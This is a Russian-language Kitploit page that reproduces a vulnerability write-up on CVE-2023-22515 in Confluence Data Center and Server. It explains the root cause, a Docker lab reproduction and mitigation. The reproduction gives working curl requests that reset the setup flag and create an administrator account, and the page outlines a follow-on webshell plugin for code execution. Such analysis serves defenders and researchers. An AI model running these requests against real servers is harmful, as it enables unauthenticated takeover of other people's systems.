Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-22515 — Детальный анализ и proof-of-concept эксплойт для CVE-2023-22515, критической уязвимости нарушения контроля доступа в Atlassian Confluence Data Center и Server, позволяющей создание учетной записи администратора без аутентификации и потенциальное удаленное выполнение кода. | Kitploit
Инструменты/GitHubGitHub/dkq-k/cve-2023-22515
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

Детальный анализ и proof-of-concept эксплойт для CVE-2023-22515, критической уязвимости нарушения контроля доступа в Atlassian Confluence Data Center и Server, позволяющей создание учетной записи администратора без аутентификации и потенциальное удаленное выполнение кода.

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-22515: Отчет об анализе уязвимости повышения привилегий Confluence Data Center & Server

1. Обзор (Overview)

CVE-2023-22515 — это критическая уязвимость нарушенного контроля доступа (Broken Access Control), обнаруженная в продуктах Atlassian Confluence Data Center и Server. Неаутентифицированный злоумышленник может удалённо повторно активировать процесс начальной настройки сервера и создать новую учётную запись администратора, полностью захватив систему.

  • CVE ID: CVE-2023-22515
  • CVSS Score: 10.0 (Критический)
  • Затронутые версии: 8.0.0 – 8.5.1 (за исключением некоторых версий)

2. Детальный анализ уязвимости (Vulnerability Analysis)

Причина (Root Cause)

Ключевая причина этой уязвимости — недостаточная проверка между механизмом привязки параметров фреймворка XWork2 и логикой обработки действий (Action) в Confluence.

Злоумышленник может манипулировать значением bootstrapStatusProvider.applicationConfig.setupComplete через параметры URL, установив его в . Этот атрибут является важным флагом, определяющим, завершена ли установка и настройка Confluence.

false
root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

После отправки этого запроса сервер в памяти будет считать, что настройка не завершена. Это не изменяет постоянный файл конфигурации (confluence.cfg.xml), но изменяет состояние во время выполнения, позволяя обойти контроль доступа.

Механизм атаки (Attack Mechanism)

  1. Сброс состояния настройки: Злоумышленник обращается к общедоступной конечной точке, такой как /server-info.action, передавая параметр bootstrapStatusProvider.applicationConfig.setupComplete=false.
  2. Обход контроля доступа: Теперь сервер считает себя в состоянии «установки», поэтому ограничения доступа к страницам административной настройки в /setup/* снимаются.
  3. Создание учётной записи администратора: Злоумышленник обращается к странице /setup/setupadministrator.action и создаёт новую учётную запись системного администратора (System Administrator).
  4. Захват системы: Войдя под созданной учётной записью администратора, злоумышленник получает все права в системе. Это позволяет выполнять дополнительные вредоносные действия, такие как загрузка веб-шелла, утечка данных, развёртывание программ-вымогателей.

3. Воспроизведение уязвимости (Reproduction)

Настройка среды (Environment Setup)

Для создания уязвимой версии (8.5.1) Confluence Server использовался Docker.

  • Docker Image: atlassian/confluence-server:8.5.1
  • Database: PostgreSQL 14

docker-compose.yml (сокращённо):

root@kitploit:~
services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... DB 설정 ...

Запуск эксплойта (Exploitation)

Чтобы избежать проблем с зависимостями Python, PoC был написан и запущен в виде Bash-скрипта с использованием curl.

Поток эксплойта (Exploit Flow):

  1. Сброс статуса настройки:

    root@kitploit:~
    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    Результат: Был возвращён ответ HTTP 302 с перенаправлением, что подтверждает внутренний сброс состояния завершения настройки.

  2. Создание администратора:

    root@kitploit:~
    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    Результат: Благодаря этому запросу была предпринята попытка создания учётной записи hacked_admin, после чего на странице входа стал возможен доступ под этой учётной записью.

4. Меры по смягчению (Mitigation)

Применение исправления (Patch)

Необходимо немедленно обновиться до последней версии, предоставленной Atlassian.

  • Fixed Versions: 8.3.3, 8.4.3, 8.5.2 и выше

Временные меры (Workaround)

Если исправление невозможно, необходимо заблокировать доступ к конечным точкам /setup/* на уровне сети (балансировщик нагрузки, WAF, обратный прокси-сервер и т.д.).

  • Блокируемый URL: /setup/*

6. Расширенная атака: сценарий RCE (Remote Code Execution)

CVE-2023-22515 позволяет злоумышленнику, получившему права администратора, перейти к выполнению системных команд (RCE).

Обзор

Confluence предоставляет администраторам право устанавливать плагины (дополнения). Злоумышленник может использовать это, загрузив вредоносный плагин, содержащий веб-шелл (Web Shell), и таким образом получить контроль над операционной системой сервера.

Цепочка атаки (Attack Chain)

  1. Создание учётной записи администратора (CVE-2023-22515): Получение прав системного администратора описанным выше способом
  2. Трюк с завершением настройки: Если сервер застрял в «Режиме установки», принудительно завершить настройку через /setup/finishsetup.action (требуется обход лицензии) или исследовать доступные меню администратора через существующую сессию
  3. Загрузка вредоносного плагина:
    • Меню: Confluence Administration -> Manage Apps -> Upload App
    • Файл: .jar файл, содержащий вредоносный Java-класс
  4. Выполнение команд:
    • Обратиться к URL, предоставленному загруженным плагином (например, /plugins/servlet/webshell?cmd=id), для выполнения системных команд

Ограничения текущей среды воспроизведения

В данной лабораторной среде (Docker) нет действительной лицензии Confluence, поэтому невозможно завершить этап начальной настройки (Setup). Соответственно, хотя запрос на создание учётной записи администратора был успешным (302 Redirect), последующий доступ к меню плагинов и фактическое выполнение RCE были ограничены. В реальной эксплуатационной среде лицензия зарегистрирована, поэтому RCE возможно немедленно без таких ограничений.

7. Заключение (Conclusion)

CVE-2023-22515 — это очень опасная уязвимость, позволяющая получить права администратора без аутентификации. Атака возможна простой манипуляцией параметрами URL, что делает её очень низкой по сложности. Поэтому организации, использующие соответствующие версии, должны немедленно применить исправления или меры по смягчению.

Скачать инструмент